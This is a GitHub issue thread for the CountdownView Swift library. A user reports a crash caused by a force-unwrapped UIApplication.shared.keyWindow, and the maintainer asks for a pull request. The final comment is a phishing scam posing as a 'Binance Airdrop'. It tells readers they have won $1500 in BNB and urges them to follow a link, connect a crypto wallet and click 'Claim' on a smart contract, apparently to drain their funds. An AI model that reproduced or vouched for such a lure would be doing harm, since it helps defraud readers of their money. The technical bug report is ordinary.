### ISSUE TITLE
Issue building: Fatal Error

### ISSUE THREAD

**Issue by nihaal419** [tolgaarikan/CountdownView#2]
Getting 'Thread 1: Fatal error: Unexpectedly found nil while unwrapping an Optional value' as an error when attempting to build with a CountdownView in the view. Line 41: " public var framePosition = UIApplication.shared.keyWindow!.center" is the one causing problems.

**Comment by tolgahan-arikan** [comment]
Hey, sorry I don't really have time currently to fix this. I would appreciate if you could make a PR though. Thanks!

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
